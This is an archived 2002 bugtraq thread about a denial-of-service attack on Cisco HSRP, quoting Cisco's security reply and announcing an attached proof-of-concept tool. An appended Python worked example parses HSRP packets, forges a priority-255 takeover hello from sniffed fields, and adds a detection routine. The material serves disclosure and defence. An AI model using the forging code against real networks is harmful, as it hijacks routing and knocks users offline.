[25707] in bugtraq
Re: Three possible DoS attacks against some IOS versions.
daemon@ATHENA.MIT.EDU (Big Poop)
Mon Jun 10 17:25:52 2002
Reply-To: stejones@bigfoot.com
From: "Big Poop" <ste0000@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 09 Jun 2002 13:41:25 +0100
Message-ID: <F5rA6WFffbpsJPSIcCA00017d33@hotmail.com>
A bit of source code I wrote a couple of months ago as proof of concept for the
HSRP DoS. It needs libpcap installed to sniff the packets to get the
authentication details + various other stuff. Spoofed packets are then sent
to the multicast address informing the group that there is a new router (the
hacker's machine / fake IP address) that has the top priority 255, thus
pre-empting the active router and causing a DoS.
The prog runs on Linux and was tested on Mandrake 8.
--------8<--------8<------- from previous post
An excerpt from RFC 2281 - Cisco HSRP
7. Security Considerations
This protocol does not provide security. The authentication field
found within the message is useful for preventing misconfiguration.
The protocol is easily subverted by an active intruder on the LAN.
This can result in a packet black hole and a denial-of-service
attack. It is difficult to subvert the protocol from outside the
LAN as most routers will not forward packets addressed to the
all-routers multicast address (224.0.0.2).
----
Cisco is considering using MD5 to improve the protection of HSRP in
future releases of IOS.
However, there are some other factors that must be considered in
this context:
- this vulnerability can be exploited only from the local segment
(not over the Internet).
- the same effect, denial of service, can be produced by using ARP,
which can not be protected in any way.
The last factor is especially important since it may cause a false
sense of security if the user is using a hardened version of HSRP as an
attacker can still disrupt the network by using crafted ARP packets.
Another aspect of this issue is that in its current implementation, HSRP
doesn't seem to perform a validity check on the IP addresses. This is
under active investigation as Cisco Bug ID CSCdu38323.
Cisco HSRP documentation can be found at -
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ics/cs009.htm
--
Sharad Ahlawat.
Product Security Incident Response Team (PSIRT) Incident Manager
http://www.cisco.com/go/psirt
Phone:+1 (408) 527-6087 (Land line and Mobile)
DH/DSS key Id: 0xC12A996C
Fingerprint: 9A93 2A20 43E5 7F01 2954 C427 1A81 A898 C12A 996C
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and registering
to receive security information from Cisco, is available on Cisco's
Worldwide Web site at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE8/+eLGoGomMEqmWwRAvQuAKDD0QUix/yYu+9R7ZgdJh0AK8pQdACeNa8q
ENh90WxBZqYLg3sjuLjxE0w=
=pCHF
-----END PGP SIGNATURE-----
------8<--------------8<-------------- end of previous post
--
Big Poop
root@networkpenetration.com
[Attachment: hsrp.tar.gz, application/x-gzip]
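The post and the RFC excerpt it quotes describe the whole attack: HSRP v1 hellos carry the group's authentication string in plaintext, so anyone on the segment can sniff one and then send a hello of their own with priority 255 and state Active, which wins the election and pre-empts the real active router. The following is an added worked example written for this page, not code from the attached hsrp.tar.gz or from Cisco: it parses and builds the RFC 2281 packet format, applies the election rule, forges the takeover hello from a sniffed one, and shows the detection side that a defender would want (hellos from unknown sources, or with the default "cisco" auth string). The sample hello, the router addresses and the `known_routers` allowlist are constructed for the example; nothing is sent on the wire.

```python
import socket
import struct
from dataclasses import dataclass

# RFC 2281 constants (HSRP v1). Hellos go to 224.0.0.2, UDP/1985, IP TTL 1.
HSRP_MCAST, HSRP_PORT = "224.0.0.2", 1985
OPCODE = {0: "Hello", 1: "Coup", 2: "Resign"}
STATE = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}
HELLO, ACTIVE = 0, 16
DEFAULT_AUTH = b"cisco"            # RFC 2281 default auth data, zero-padded to 8 bytes
# ver, opcode, state, hellotime, holdtime, priority, group, reserved, auth[8], vip[4]
_FMT = "!BBBBBBBB8s4s"
HSRP_LEN = struct.calcsize(_FMT)   # 20 bytes


@dataclass
class HsrpHello:
    opcode: int
    state: int
    hellotime: int
    holdtime: int
    priority: int
    group: int
    auth: bytes
    virtual_ip: str

    def pack(self) -> bytes:
        """Serialise to the RFC 2281 wire format (the version byte is always 0)."""
        return struct.pack(_FMT, 0, self.opcode, self.state, self.hellotime,
                           self.holdtime, self.priority, self.group, 0,
                           self.auth.ljust(8, b"\x00")[:8],
                           socket.inet_aton(self.virtual_ip))


def parse_hsrp(payload: bytes) -> HsrpHello:
    """Decode the UDP payload of one HSRP packet. Note the auth field is plaintext:
    a sniffer recovers it directly, which is the step the post's tool performs."""
    if len(payload) < HSRP_LEN:
        raise ValueError("HSRP payload too short")
    ver, op, state, hello, hold, prio, group, _res, auth, vip = struct.unpack(_FMT, payload[:HSRP_LEN])
    if ver != 0:
        raise ValueError(f"unsupported HSRP version {ver}")
    return HsrpHello(op, state, hello, hold, prio, group,
                     auth.rstrip(b"\x00"), socket.inet_ntoa(vip))


def wins_election(prio_a: int, ip_a: str, prio_b: int, ip_b: str) -> bool:
    """RFC 2281 election: higher priority becomes active; on a tie the higher IP wins."""
    def key(prio, ip):
        return (prio, struct.unpack("!I", socket.inet_aton(ip))[0])
    return key(prio_a, ip_a) > key(prio_b, ip_b)


def forge_takeover_hello(captured: HsrpHello) -> HsrpHello:
    """The packet the post describes: reuse group, auth and virtual IP from a sniffed
    hello, claim priority 255 and state Active so the real active router is pre-empted."""
    return HsrpHello(HELLO, ACTIVE, captured.hellotime, captured.holdtime, 255,
                     captured.group, captured.auth, captured.virtual_ip)


def audit_hellos(hellos, known_routers):
    """Detection side. `hellos` is a list of (source_ip, udp_payload) as a sniffer
    would hand them over; `known_routers` is an operator-maintained allowlist
    (assumed here). Flags the default auth string and any hello from an unknown source."""
    findings = []
    for src, payload in hellos:
        h = parse_hsrp(payload)
        if h.auth == DEFAULT_AUTH:
            findings.append((src, "default auth 'cisco' in use"))
        if src not in known_routers:
            findings.append((src, f"unknown router in group {h.group} claiming priority "
                                  f"{h.priority} ({STATE.get(h.state, h.state)})"))
    return findings


def demo():
    """Constructed scenario: legitimate active router 10.0.0.2, group 1, VIP 10.0.0.1,
    default priority 100 and default auth; attacker at 10.0.0.66 replays the fields."""
    legit = HsrpHello(HELLO, ACTIVE, 3, 10, 100, 1, DEFAULT_AUTH, "10.0.0.1")
    sniffed = parse_hsrp(legit.pack())          # what libpcap would hand the attacker
    forged = forge_takeover_hello(sniffed)
    takeover = wins_election(forged.priority, "10.0.0.66", legit.priority, "10.0.0.2")
    alerts = audit_hellos([("10.0.0.2", legit.pack()), ("10.0.0.66", forged.pack())],
                          known_routers={"10.0.0.2"})
    return sniffed, forged, takeover, alerts


if __name__ == "__main__":
    sniffed, forged, takeover, alerts = demo()
    print("sniffed auth:", sniffed.auth, "forged priority:", forged.priority,
          "takeover:", takeover)
    for src, msg in alerts:
        print(f"ALERT {src}: {msg}")
```

The election check is what makes priority 255 sufficient: no legitimate router can be configured above it, so the forged hello always wins, and if the attacker's source IP is higher than the real router's it also wins a tie against another 255. The detection function illustrates the caveat from the Cisco reply: an auth string (even a non-default one, or the MD5 variant Cisco mentions) only makes the forgery need a sniffed secret, while an allowlist of expected source addresses catches the new router itself; neither helps against the ARP-based variant the reply points out, which has to be addressed at the switch rather than in HSRP.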